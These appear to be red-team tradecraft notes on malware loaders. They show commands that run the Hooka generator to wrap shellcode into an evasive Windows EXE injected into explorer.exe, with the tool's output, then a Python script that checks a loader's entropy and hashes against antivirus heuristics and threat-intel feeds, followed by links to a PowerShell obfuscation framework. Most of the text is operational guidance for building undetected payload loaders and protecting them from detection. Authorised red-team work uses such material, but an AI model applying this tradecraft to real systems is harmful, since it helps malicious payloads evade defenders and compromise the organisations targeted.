Important
Use open-source malware droppers/loaders when playing in testing environments. You don't want to burn your own dropper while you are just playing around: its hashes, strings and behaviour end up in vendor telemetry and sandboxes, and a burned loader is useless on a real engagement.
Hooka
- Runs on Linux and cross-compiles Windows binaries (no Windows build box needed)
- Written in Go
# simplest command
./build/hooka_linux_amd64 -i ~/webserver/smb.x64.bin -o imdone.exe
# the more evasion options you stack on, the buggier the loader gets and the less likely it is to run
# glhf
./build/hooka_linux_amd64 -i ~/webserver/smb.x64.bin -o imdone.exe --proc explorer.exe
_ _ _ _
| | | | ___ ___ | | __ __ _ | |
| |_| | / _ \ / _ \ | |/ / / _` | | |
| _ | | (_) | | (_) | | < | (_| | |_|
|_| |_| \___/ \___/ |_|\_\ \__,_| (_)
[*] Obtaining shellcode from /home/lo/webserver/smb.x64.bin
> Shellcode is in raw format
[*] Defining evasion techniques...
[*] Using suspendedprocess technique to execute shellcode
[*] Obfuscating variables and functions...
[*] Compiling shellcode loader...
> Payload format is set to EXE
> go build -o imdone.exe loader.go
> 3154432 bytes written to imdone.exe
[+] Loader file entropy: 6.9330213473661955
[+] Checksums:
> MD5: 6666b187280d31537b083c69631b636c
> SHA1: 64ff907b7c9d94564ce5857145dd70d8b4761044
> SHA256: d9b5fc90dcd569ae2f00b7dc7bb1ddeae28e1cacc201628afa7d809061dfe561
[+] Shellcode loader has been successfully generated
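The entropy and checksum lines in the output above are worth reproducing yourself before a loader leaves the lab: the hashes are what you search for in threat-intel feeds to confirm the sample is not already known, and the entropy is what packer/crypter heuristics key on. The script below is an added example, not Hooka's own code: it computes Shannon entropy in bits per byte over the whole file (the same unit Hooka reports) plus MD5/SHA1/SHA256, and flags the file if the entropy sits above a cutoff. The 7.0 cutoff and the two sample "PE" blobs are constructed assumptions for the demo; real loaders are fed in with report_path().

```python
"""Reproduce the entropy/checksum lines a loader generator prints, offline.

Added example (not Hooka's code). Shannon entropy is computed in bits per byte
over the whole file; the PACKED_ENTROPY_THRESHOLD is an assumed heuristic
cutoff, not a value taken from Hooka or from any specific AV engine.
"""
import hashlib
import math
from collections import Counter

PACKED_ENTROPY_THRESHOLD = 7.0  # assumption: tune against the AV/EDR you test with


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty/uniform input, 8.0 max."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_report(data: bytes) -> dict:
    """Return the fields Hooka logs (size, entropy, hashes) plus two sanity checks."""
    entropy = shannon_entropy(data)
    return {
        "bytes": len(data),
        "is_pe": data[:2] == b"MZ",          # cheap check that the output really is a PE
        "entropy": round(entropy, 4),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "looks_packed": entropy >= PACKED_ENTROPY_THRESHOLD,
    }


def report_path(path: str) -> dict:
    """Run file_report() over a loader on disk, e.g. report_path('imdone.exe')."""
    with open(path, "rb") as f:
        return file_report(f.read())


# Constructed sample inputs so the script runs without a real loader:
# LOW  = an "MZ" header followed by zero padding (almost no entropy),
# HIGH = an "MZ" header followed by every byte value repeated 16 times,
#        the flat distribution an encrypted/compressed payload shows.
LOW = b"MZ" + b"\x00" * 4094
HIGH = b"MZ" + bytes(range(256)) * 16

if __name__ == "__main__":
    for name, blob in (("low", LOW), ("high", HIGH)):
        r = file_report(blob)
        print(f"[{name}] {r['bytes']} bytes  entropy={r['entropy']}  "
              f"pe={r['is_pe']}  looks_packed={r['looks_packed']}")
        print(f"   SHA256: {r['sha256']}")
```

Hooka's own 6.93 for the loader above is below this cutoff, which is roughly what you would expect from a Go binary carrying an encrypted blob; anything close to 8.0 across the whole file usually means the entire image is packed, and that on its own gets flagged by many engines. Compare the hashes you compute against what the generator printed so you know the file on disk is the one you built and nothing rewrote it.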
Invoke-Obfuscation
- PowerShell script obfuscation framework by Daniel Bohannon (token, string, encoding, compression and launcher obfuscation layers); the same rule applies, burn its public output in the lab rather than your own tradecraft
- https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide
- https://github.com/danielbohannon/Invoke-Obfuscation
- https://x.com/dmcxblue/status/1879176230098157962?t=bhHdazl7dNhn39P3g5jVpw&s=19